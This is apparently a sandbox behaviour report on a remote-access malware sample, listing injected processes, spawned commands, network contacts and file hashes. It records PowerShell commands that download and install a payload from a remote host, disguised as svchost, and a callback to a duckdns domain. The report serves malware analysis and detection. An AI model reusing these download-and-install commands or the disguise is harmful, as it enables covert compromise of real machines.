PID 668 wrote to memory of 4340 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4972 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 668 wrote to memory of 4972 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 668 wrote to memory of 4292 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4292 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4968 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 668 wrote to memory of 4968 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 668 wrote to memory of 1452 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 1452 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4872 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 4872 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 668 wrote to memory of 1536 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 668 wrote to memory of 1536 N/A C:\Users\Admin\AppData\local\svchost\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-12_8fd2994edebc3a3ddde2a14b3f5c4183_hijackloader_poet-rat_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c explorer.exe "_가이아서버 접속기.exe"

C:\Windows\explorer.exe

explorer.exe "_가이아서버 접속기.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "New-Item -ItemType Directory -Force -Path C:\Users\Admin\AppData\local\svchost"

C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe

"C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -uninstall"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.exe -OutFile C:\Users\Admin\AppData\local\svchost\svchost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 60 -ip 60

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 60 -s 420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.msh -OutFile C:\Users\Admin\AppData\local\svchost\svchost.msh"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -install"

C:\Users\Admin\AppData\local\svchost\svchost.exe

"C:\Users\Admin\AppData\local\svchost\svchost.exe" -install

C:\Users\Admin\AppData\local\svchost\svchost.exe

"C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -noprofile -nologo -command -

Network

Country Destination Domain Proto
US 8.8.8.8:53 files.catbox.moe udp
US 108.181.20.35:443 files.catbox.moe tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 35.20.181.108.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev udp
US 172.66.0.235:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 8.8.8.8:53 235.0.66.172.in-addr.arpa udp
US 172.66.0.235:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 8.8.8.8:53 sktelecom.duckdns.org udp
KR 203.234.238.140:443 sktelecom.duckdns.org tcp
US 8.8.8.8:53 140.238.234.203.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp

Files

memory/3636-2-0x00007FFA10103000-0x00007FFA10105000-memory.dmp

memory/3636-3-0x0000024772E10000-0x0000024772E32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1yp0eioo.pub.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3636-13-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

memory/3636-14-0x0000024773320000-0x0000024773364000-memory.dmp

memory/3636-15-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

memory/3636-16-0x0000024773370000-0x00000247733E6000-memory.dmp

memory/3636-17-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe

MD5 c5fc53d3969bea56dc506c473b805c13
SHA1 7c59712142fe98d48ca6276851ee890585c9772a
SHA256 21956ec4108a00fc6aae28ffa52ebb3dd76a1d9d1adac9648df2a6354646052c
SHA512 79d45c966c534831b26e71b48f0a0690a8a61e4d47998deb1b2e35fb50a26fdea072db34805c7e1db35f105e3bd062f05094b102d5d6290bfa20c0847485856b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

memory/60-42-0x0000000000890000-0x0000000000B4C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5063fb2c6625068c1224c68b5c1ce46
SHA1 8867a7637689af271e445a7379c810335591e708
SHA256 2bfdeab5f252777c7bbbb7b8b033e03e37d3e2061dce73c8af03c196e1b26bfe
SHA512 ad62e5268c8fe5b7b72d40d8724ab7ae2fa3d3e910122ad36f61e6c1ec81c22e1ef3b4477006085212b20342aa073ee2275e0095e92c4ac350df6814149aca58

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a12c129e02e3d0e0ff14020158d6e53
SHA1 383434d0df826622f06b1f3811124782df21507b
SHA256 e0c11799edb944329f9ec85fd54a7038ea7df63d6a07162bc36fc03edb1bceb7
SHA512 4b6f2a88fc882ea9c05e9d8819114e35f30deae4366eafd1ec509d87cb02a26f2441b987272713725cbab9684233309e084802e7475876917fe9d6ab9e9cd05d

C:\Users\Admin\AppData\local\svchost\svchost.exe

MD5 400b9faa5f261a5a0d194e633483571c
SHA1 b5bf2b5692d6e2eb800406d77a5f1de6a852ede8
SHA256 1dbe9d36ce4a1dfb469fb20c1b2b8964e5e08a96f3cf46ba6bdfc27247d97b65
SHA512 3cce6f30a3c2c2b09d13292d0de3fc0809f3617874e642b914ec9ee3982a915d20bfd25b9db40e3dc63b390ffcb9ef57654b9d82760b4a2ab3f4cc76914164d5

memory/3636-80-0x00007FFA10103000-0x00007FFA10105000-memory.dmp

memory/3284-81-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

C:\Users\Admin\AppData\local\svchost\svchost.msh

MD5 90f91efb0b6cc632ea6b2bb3a6d5fb40
SHA1 e46a39e7252e086f34d64c3d720442cd325de506
SHA256 7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9
SHA512 f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928

memory/3636-84-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

memory/668-85-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

memory/3284-87-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

memory/3636-90-0x00007FFA10100000-0x00007FFA10BC1000-memory.dmp

memory/668-122-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

memory/668-123-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp

C:\Users\Admin\AppData\Local\svchost\svchost.db.tmp

MD5 72085bad44dad6707a598fd489c6850d
SHA1 37f2e77c5a5e1981c2753b974017d1842965f910
SHA256 cc591d737cad43ec26a49ddb9128c42d709b0f0cff9630b77c963a263439e56f
SHA512 0be7a5c2c1d351f4d041b9525c307dcdb8f365c543e7d1eb44761812458895be65f776c8dd5cc85ddfe9defe922f5c468ff266c242ccc895b928f388b70552ca

memory/668-134-0x00007FF64DA20000-0x00007FF64DDA4000-memory.dmp